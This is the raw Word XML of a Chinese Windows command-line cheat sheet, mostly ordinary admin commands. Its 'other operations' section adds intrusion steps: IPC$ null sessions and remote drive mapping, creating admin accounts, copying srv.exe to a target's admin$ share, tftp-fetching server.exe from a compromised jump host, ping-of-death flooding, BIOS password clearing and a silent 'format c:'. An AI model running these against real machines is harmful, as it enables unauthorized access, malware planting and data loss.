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5E5" w:rsidRPr="00192379" w:rsidRDefault="0030483B" w:rsidP="00A414F7">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r w:rsidR="003B05E5" w:rsidRPr="00192379">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用的</w:t>
      </w:r>
      <w:r w:rsidR="003B05E5" w:rsidRPr="00192379">
        <w:t>100个CMD指令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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00192379">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00192379">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192379">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>gpedit.msc—–组策略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2. sndrec32——-录音机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3. Nslookup——-IP地址侦测器 ，是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中却没有集成这一个工具。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4. explorer——-打开资源管理器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5. logoff———注销命令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6. shutdown——-60秒倒计时关机命令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7. lusrmgr.msc—-本机用户和组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8. services.msc—本地服务设置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9. oobe/msoobe /a—-检查XP是否激活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10. notepad——–打开记事本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11. cleanmgr——-垃圾整理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12. net start messenger—-开始信使服务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13. compmgmt.msc—计算机管理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14. net stop messenger—–停止信使服务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15. conf———–启动netmeeting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16. dvdplay——–DVD播放器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17. charmap——–启动字符映射表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18. diskmgmt.msc—磁盘管理实用程序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19. calc———–启动计算器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20. dfrg.msc——-磁盘碎片整理程序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21. chkdsk.exe—–Chkdsk磁盘检查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lastRenderedPageBreak/>
        <w:t>22. devmgmt.msc— 设备管理器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23. regsvr32 /u *.dll—-停止dll文件运行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24. drwtsn32—— 系统医生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25. rononce -p—-15秒关机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26. dxdiag———检查DirectX信息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27. regedt32——-注册表编辑器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28. Msconfig.exe—系统配置实用程序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29. rsop.msc——-组策略结果集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30. mem.exe——–显示内存使用情况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31. regedit.exe—-注册表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32. winchat——–XP自带局域网聊天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33. progman——–程序管理器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34. winmsd———系统信息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35. perfmon.msc—-计算机性能监测程序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36. winver———检查Windows版本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37. sfc /scannow—–扫描错误并复原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38. taskmgr—–任务管理器（2000/xp/2003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39. winver———检查Windows版本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40. wmimgmt.msc—-打开windows管理体系结构(WMI)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41. wupdmgr——–windows更新程序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42. wscript——–windows脚本宿主设置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43. write———-写字板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44. winmsd———系统信息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45. wiaacmgr——-扫描仪和照相机向导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46. winchat——–XP自带局域网聊天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lastRenderedPageBreak/>
        <w:t>47. mem.exe——–显示内存使用情况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48. Msconfig.exe—系统配置实用程序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49. mplayer2——-简易widnows media player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50. mspaint——–画图板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51. mstsc———-远程桌面连接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52. mplayer2——-媒体播放机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53. magnify——–放大镜实用程序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54. mmc————打开控制台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55. mobsync——–同步命令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56. dxdiag———检查DirectX信息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57. iexpress——-木马捆绑工具，系统自带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58. fsmgmt.msc—–共享文件夹管理器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59. utilman——–辅助工具管理器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60. diskmgmt.msc—磁盘管理实用程序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61. dcomcnfg——-打开系统组件服务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62. ddeshare——-打开DDE共享设置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63. osk————打开屏幕键盘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64. odbcad32——-ODBC数据源管理器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65. oobe/msoobe /a—-检查XP是否激活 114. logoff———注销命令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66. notepad——–打开记事本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67. nslookup——-网络管理的工具向导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68. ntbackup——-系统备份和还原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69. narrator——-屏幕“讲述人”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70. ntmsmgr.msc—-移动存储管理器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71. ntmsoprq.msc—移动存储管理员操作请求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lastRenderedPageBreak/>
        <w:t>72. netstat -an—-(TC)命令检查接口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73. syncapp——–创建一个公文包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74. sysedit——–系统配置编辑器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75. sigverif——-文件签名验证程序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76. ciadv.msc——索引服务程序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77. shrpubw——–创建共享文件夹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78. secpol.msc—–本地安全策略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79. syskey———系统加密，一旦加密就不能解开，保护windows xp系统的双重密码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80. services.msc—本地服务设置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81. Sndvol32——-音量控制程序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82. sfc.exe——–系统文件检查器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83. sfc /scannow—windows文件保护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84. ciadv.msc——索引服务程序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85. tourstart——xp简介（安装完成后出现的漫游xp程序）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86. taskmgr——–任务管理器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87. eventvwr——-事件查看器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88. eudcedit——-造字程序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89. compmgmt.msc—计算机管理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90. packager——-对象包装程序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91. perfmon.msc—-计算机性能监测程序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92. charmap——–启动字符映射表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93. cliconfg——-SQL SERVER 客户端网络实用程序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94. Clipbrd——–剪贴板查看器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95. conf———–启动netmeeting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lastRenderedPageBreak/>
        <w:t>96. certmgr.msc—-证书管理实用程序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97. regsvr32 /u *.dll—-停止dll文件运行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98. regsvr32 /u zipfldr.dll——取消ZIP支持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99. cmd.exe——–CMD命令提示符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100. chkdsk.exe—–Chkdsk磁盘检查</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF299A" w:rsidRDefault="0030483B" w:rsidP="00BF299A">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、</w:t>
      </w:r>
      <w:r w:rsidR="003B05E5" w:rsidRPr="00192379">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>磁盘操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF299A" w:rsidRDefault="003B05E5" w:rsidP="004F0EE0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF299A">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>fdisk 隐含 参数 /mbr 重建主引导记录fdisk /mbr 重建主引导记录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="00BF299A" w:rsidRDefault="003B05E5" w:rsidP="004F0EE0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF299A">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>fdisk 在DOS7.0以后增加了/cmbr参数，可在挂接多个物理硬盘时，重建排序在后面的硬盘的主引导记录，例如：fdisk /cmbr 2，可重写第二个硬盘的主引导记录。（在使用时要十分小心，避免把好的硬盘引导记录损坏）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="004F0EE0" w:rsidRDefault="003B05E5" w:rsidP="004F0EE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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0EE0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>format 参数： /q 快速格式化 /u 不可恢复 /autotest 不提示 /s 创建 MS-DOS 引导盘</w:t>
      </w:r>
      <w:r w:rsidR="00C81A9A" w:rsidRPr="004F0EE0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> format c: /q /u /autotest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="00C81A9A" w:rsidRDefault="0030483B" w:rsidP="00C81A9A">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、</w:t>
      </w:r>
      <w:r w:rsidR="003B05E5" w:rsidRPr="00192379">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="004F0EE0" w:rsidRDefault="003B05E5" w:rsidP="004F0EE0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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0EE0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DIR [目录名或文件名] [/S][/W][/P][/A] 列出目录 参数: /s 查找子目录/w 只显示文件名 /p 分页/a 显示隐藏文件 DIR format.exe /s查找该盘的format.exe文件并报告位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="004F0EE0" w:rsidRDefault="003B05E5" w:rsidP="004F0EE0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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0EE0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">MD (MKDIR) [目录名] 创建目录 MKDIR HELLOWORLD 创建HELLOWORLD目录  　　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="004F0EE0" w:rsidRDefault="003B05E5" w:rsidP="004F0EE0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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0EE0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CD (CHDIR) [目录名] PS:可以使用相对目录或绝对目录 进入目录 CD AA 进入当前文件夹下的AA目录,cd .. 进入上一个文件夹cd \返回根目录;cd c:\windows 进入c:\windows文件夹</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="004F0EE0" w:rsidRDefault="003B05E5" w:rsidP="004F0EE0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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0EE0">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RD ( RMDIR) [目录名] 删除目录 RD HELLOWORLD 删除HELLOWORLD目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="00192379" w:rsidRDefault="00E43C11" w:rsidP="004F0EE0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四、</w:t>
      </w:r>
      <w:r w:rsidR="003B05E5" w:rsidRPr="00192379">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件操作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删除目录及其文件： rmdir [目录名或文件名] [/S][/W][/P][/A] 。例 rmdir c:\qqdownload/s 删除C盘的qqdownload目录。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="00192379" w:rsidRDefault="003B05E5" w:rsidP="007D0925">
      <w:pPr>
        <w:ind w:firstLine="420"/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del [目录名或文件名] [/f][/s][/q] 删除 参数:/f 删除只读文件/s 删除该目录及其下的所有内容 /q 删除前不确认</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="00192379" w:rsidRDefault="003B05E5" w:rsidP="007D0925">
      <w:pPr>
        <w:ind w:firstLine="420"/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del c:\del /s /q 自动删除c盘的del目录。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="00192379" w:rsidRDefault="003B05E5" w:rsidP="007D0925">
      <w:pPr>
        <w:ind w:firstLine="420"/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copy [源文件或目录] [目标目录] 复制文件 copy d:\pwin98*.* c:\presetup 将d盘的pwin98的所有文件复制到c盘的presetup下。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="00192379" w:rsidRDefault="003B05E5" w:rsidP="007D0925">
      <w:pPr>
        <w:ind w:firstLine="420"/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attrib [参数][源文件或目录] 文件属性操作命令，attrib命令可以列出或修改磁盘上文件的属性，文件属性包括文档（A）、只读(R)、隐藏(H)、系统(S)，例如：attrib -h -r -s io.sys 执行这一命令后，将把DOS系统文件io.sys文件的只读、隐藏、系统属性去掉，这时将可以直接通过dir命令看到io.sys文件。attrib +h +r +s autoexec.bat将为自动批处理文件增加以上属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="00192379" w:rsidRDefault="007D0925" w:rsidP="007D0925">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五、</w:t>
      </w:r>
      <w:r w:rsidR="003B05E5" w:rsidRPr="00192379">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存操作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debug 调试内存 参数 -w [文件名] 写入二进制文件 -o [地址1] [地址2] 输出内存 -q 退出 exp:o 70 10[return] o 71 01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="00934996" w:rsidRDefault="003B05E5" w:rsidP="00934996">
      <w:pPr>
        <w:ind w:firstLine="420"/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>[return] 01[return] q[return] DOS下通过写70h/71h PORT改变BIOS密码在CMOS中存放的对应位置的值,用以清除AWARD BIOS密码.debug 还可以破解硬盘保护卡等,但只可以在纯DOS下用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="009761DE" w:rsidRDefault="00934996" w:rsidP="009761DE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>六、</w:t>
      </w:r>
      <w:r w:rsidR="003B05E5" w:rsidRPr="00192379">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分区操作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 xml:space="preserve">    给磁盘分区，一般都会分成四个区，磁盘分区由主分区、扩展分区、逻辑分区组成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="00192379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/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    PQ和Acronis Disk Director这两个工具都可以在不丢失数据的情况下对分区进行调整大小，以及合并等操作，XP系统的话你用PQ，WIN7系统的话用Acronis Disk Director 操作基本一样，可以去网上找教程来看看，再不重装系统的情况下都能调整分区大小，但是建议你还是先备份下数据再调整，毕竟对硬盘直接进行的操作有一定的危险性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="00192379" w:rsidRDefault="006E66CF" w:rsidP="00B5046B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>七、</w:t>
      </w:r>
      <w:r w:rsidR="003B05E5" w:rsidRPr="00192379">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他操作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use ipipc$ " " /user:" " 建立IPC空链接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use ipipc$ "密码" /user:"用户名" 建立IPC非空链接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use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为</w:t>
      </w:r>
      <w:r w:rsidR="00B5046B" w:rsidRPr="001D1B1D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>H: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use h: ipc$ 登陆后映射对方C：到本地为H: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use ipipc$ /del 删除IPC链接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use h: /del 删除映射对方到本地的为H:的映射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user 用户名　密码　/add 建立用户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user guest /active:yes 激活guest用户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user 查看有哪些用户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user 帐户名 查看帐户的属性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localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限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start 查看开启了哪些服务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lastRenderedPageBreak/>
        <w:t>net start 服务名　开启服务；(如:net start telnet， net start schedule)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stop 服务名 停止某服务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time 目标ip 查看对方时间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time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息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view 查看本地局域网内开启了哪些共享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view ip 查看对方局域网内开启了哪些共享</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102C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config 显示系统网络设置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logoff 断开连接的共享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pause 服务名 暂停某服务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send ip "文本信息" 向对方发信息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ver 局域网内正在使用的网络连接类型和信息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share 查看本地开启的共享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share ipc$ 开启ipc$共享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share ipc$ /del 删除ipc$共享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share c$ /del 删除C：共享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user guest 12345 用guest用户登陆后用将密码改为12345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 password 密码 更改系统登陆密码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netstat -a 查看开启了哪些端口,常用netstat -an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netstat -n 查看端口的网络连接情况，常用netstat -an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netstat -v 查看正在进行的工作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netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况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netstat -s 查看正在使用的所有协议使用情况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nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1B1D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>最近登陆的用户名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tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。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ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。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ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)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ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息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tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)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kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)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del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件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del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）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move 盘符路径要移动的文件名　存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="001D1B1D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>fc one.txt two.txt &gt; 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"&gt; "和"&gt; &gt;" 是重定向命令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lastRenderedPageBreak/>
        <w:t>at id号 开启已注册的某个计划任务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="001D1B1D" w:rsidRDefault="003B05E5" w:rsidP="001D1B1D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="2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at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止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at id号 /delete 停止某个已注册的计划任务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at 查看所有的计划任务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at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机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finger username @host 查看最近有哪些用户登陆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telnet ip 端口 远和登陆服务器,默认端口为23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open ip 连接到IP（属telnet登陆后的命令）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telnet 在本机上直接键入telnet 将进入本机的telnet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copy 路径文件名1　路径文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件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copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下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copy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件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copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：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xcopy 要复制的文件或目录树　目标地址目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件</w:t>
      </w:r>
      <w:r w:rsidR="008D126B" w:rsidRPr="001D1B1D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1B1D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>用参数</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1B1D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/e才可连目录下的子目录一起复制到目标地址下。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tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exec:server.exe 登陆后，将“IP”的server.exe下载到目标主机c:server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1B1D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如不加-i 则以ASCII模式（传送文本文件模式）进行传送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tftp -i 对方IP　put c:server.exe 登陆后，上传本地c:server.exe至主机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ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)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route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface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arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息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start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令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mem 查看cpu使用情况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attrib 文件名(目录名) 查看某文件（目录）的属性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attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用+则是添加为某属性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dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间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date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间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set 指定环境变量名称=要指派给变量的字符 设置环境变量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set 显示当前所有的环境变量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set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量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pause 暂停批处理程序，并显示出：请按任意键继续....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lastRenderedPageBreak/>
        <w:t>if 在批处理程序中执行条件处理（更多说明见if命令及变量）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goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）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call 路径批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）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for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）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echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置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echo 信息 在屏幕上显示出信息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echo 信息 &gt;&gt; pass.txt 将"信息"保存到pass.txt文件中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findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello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find 文件名 查找某文件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title 标题名字 更改CMD窗口标题名字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color 颜色值 设置cmd控制台前景和背景颜色；0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白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prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为：EntSky )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 xml:space="preserve">ver 在DOS窗口下显示版本信息 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winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）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format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS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md　目录名 创建目录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lastRenderedPageBreak/>
        <w:t>replace 源文件　要替换文件的目录 替换文件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ren 原文件名　新文件名 重命名文件名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tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称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type 文件名 显示文本文件的内容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more 文件名 逐屏显示输出文件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doskey 要锁定的命令=字符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doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=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taskmgr 调出任务管理器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chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误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tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口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exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe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path 路径可执行文件的文件名 为可执行文件设置一个路径。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cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?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regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；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regedit /e 注册表文件名 导出注册表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cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1B1D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。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cacls 文件名 查看文件的访问用户权限列表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REM 文本内容 在批处理文件中添加注解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B05E5" w:rsidRPr="001D1B1D" w:rsidRDefault="003B05E5" w:rsidP="001D1B1D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1B1D">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>netsh 查看或更改本地网络配置情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E1E9A" w:rsidRPr="008D126B" w:rsidRDefault="003B05E5" w:rsidP="00192379">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192379">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>原文：</w:t>
      </w:r>
      <w:r w:rsidRPr="00192379">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">https://blog.csdn.net/CDersTeam/article/details/51346911 </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003E1E9A" w:rsidRPr="008D126B" w:rsidSect="004F14E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C1695"/>
